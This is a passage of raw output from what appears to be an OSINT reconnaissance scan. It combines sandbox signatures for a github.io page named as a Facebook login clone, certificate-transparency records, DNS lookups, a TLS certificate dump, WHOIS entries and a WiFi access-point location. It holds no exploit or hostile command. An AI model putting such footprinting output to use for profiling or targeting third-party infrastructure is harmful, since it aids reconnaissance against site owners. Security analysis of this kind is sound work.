en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "facebook_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_d74_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_d74_ConnHashTable<3444>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d74_IESQMMUTEX_0_331"\n "IsoScope_d74_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3444"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d74_IE_EarlyTabStart_0x97c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d74_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', 
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sahnawaz786.github.io"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "PHD1U0AR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PHD1U0AR.txt]- [targetUID: 00000000-00003444]\n Dropped file: "3SZP8PGX.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3SZP8PGX.txt]- [targetUID: 00000000-00003444]\n Dropped file: "ZF56VNU9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZF56VNU9.txt]- [targetUID: 00000000-00002884]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "~DFA37422F32059F537.TMP" has type "data"- Location: [%TEMP%\\~DFA37422F32059F537.TMP]- [targetUID: 00000000-00003444]\n "~DF94049321D0CFF6EA.TMP" has type "data"- Location: [%TEMP%\\~DF94049321D0CFF6EA.TMP]- [targetUID: 00000000-00003444]\n 
"~DF7AA4F6B0C2777651.TMP" has type "data"- Location: [%TEMP%\\~DF7AA4F6B0C2777651.TMP]- [targetUID: 00000000-00003444]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "Facebook_login_clone_project_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "Facebook_login_clone_project_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "~DFA29BB38809160733.TMP" has type "data"- Location: [%TEMP%\\~DFA29BB38809160733.TMP]- [targetUID: 00000000-00003444]\n "PHD1U0AR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PHD1U0AR.txt]- [targetUID: 00000000-00003444]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "3SZP8PGX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3SZP8PGX.txt]- [targetUID: 00000000-00003444]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003444]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002884]\n "_5CFD1796-A009-11ED-9493-080027E9E15B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "fblogo_1_.png" has type "PNG image data 512 x 512 8-bit colormap non-interlaced"- [targetUID: N/A]\n "RecoveryStore._8BEC63F7-A007-11ED-9493-080027E9E15B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_8BEC63F9-A007-11ED-9493-080027E9E15B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', 
u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /Facebook_login_clone_project HTTP/1.1\nAccept | 185.199.111.153 |
| 2023-05-12 02:57:33 | Raw Data from RIRs | No | Certificate Transparency | 8 | 0 | 1 | 0 | None | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 
183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, 
u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] | ayhu.xyz |
| 2023-05-12 02:44:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cdn-185-199-109-153.github.com | 185.199.109.153 |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000yesnt.github.io |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 72.170.74.34.bc.googleusercontent.com | 34.74.170.72 |
| 2023-05-12 02:44:20 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@support.gandi.net | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sprint Drive (Net ID: 00:0A:F5:55:59:00) | 39.0469, -77.4903 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 14:27:58.330 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:5D:91:A5:EC:4A:FC:74:A1:CB:A1:43:42:
98:62:F0:F5:48:D8:59:AD:3A:BF:07:84:B7:A0:B8:FB:
F5:7F:02:9D:02:20:12:51:01:88:30:77:0C:12:2D:94:
E1:FC:28:63:C7:64:51:4C:7A:14:F6:58:60:D3:18:55:
AA:0B:5F:BF:83:CC
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 14:27:58.947 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D5:B1:CF:FB:EB:66:58:C1:7C:1F:B7:
27:25:02:E3:9E:12:C4:74:28:D8:27:C6:B7:CB:84:D4:
7D:B7:00:1E:10:02:20:0C:56:3E:2A:0C:E4:D2:75:F2:
E0:99:5F:A7:32:B4:86:4A:7F:09:D3:E9:8B:5E:F2:A9:
78:DC:08:7A:AD:C8:9D
Signature Algorithm: sha256WithRSAEncryption
56:f1:41:e3:6f:ab:da:37:be:d4:6d:55:43:59:14:33:ac:42:
61:99:54:b2:cc:68:3b:12:68:7c:14:63:9a:e3:c7:2d:28:07:
ac:4e:8c:b4:88:4d:80:ce:91:c9:a5:4d:dd:f1:2e:8e:58:cd:
80:0c:46:fa:23:e4:c8:e8:14:61:72:93:e1:44:e8:c3:77:c0:
aa:ee:7c:6f:ea:e8:70:f4:d2:e3:e8:1b:8a:39:ca:f5:73:f4:
96:02:3b:a3:36:c0:cb:29:b2:45:5f:f0:82:fc:84:4a:6e:b5:
8b:1c:4a:0e:46:1e:66:a9:10:39:d1:75:3c:a8:c4:57:7f:9f:
62:b2:b2:a2:ec:e6:f3:84:e9:0c:f9:be:3e:3f:3f:98:a2:49:
b7:f8:ec:62:7a:a6:69:6f:94:d9:c6:a1:e0:cd:b8:20:3a:ae:
44:80:7f:ac:d9:a3:54:24:56:5d:f1:bf:01:6e:fe:df:0c:62:
2d:77:e4:5c:18:4d:90:25:51:13:68:40:ac:f8:0c:fc:86:c6:
34:50:55:8e:da:35:b1:44:f3:0d:df:99:4c:2f:5a:3f:d4:52:
8d:52:80:94:14:ff:5b:30:58:13:05:5b:9a:df:d5:d4:32:40:
69:ff:dd:82:79:46:62:09:c8:ab:58:69:3f:2e:57:89:60:f9:
31:9d:86:6b
|
| 2023-05-12 02:56:57 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/angular/angular.js/pull/2902', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/angular/angular.js/blob/master/src/ng/urlutils.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://pickerwheel.com/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 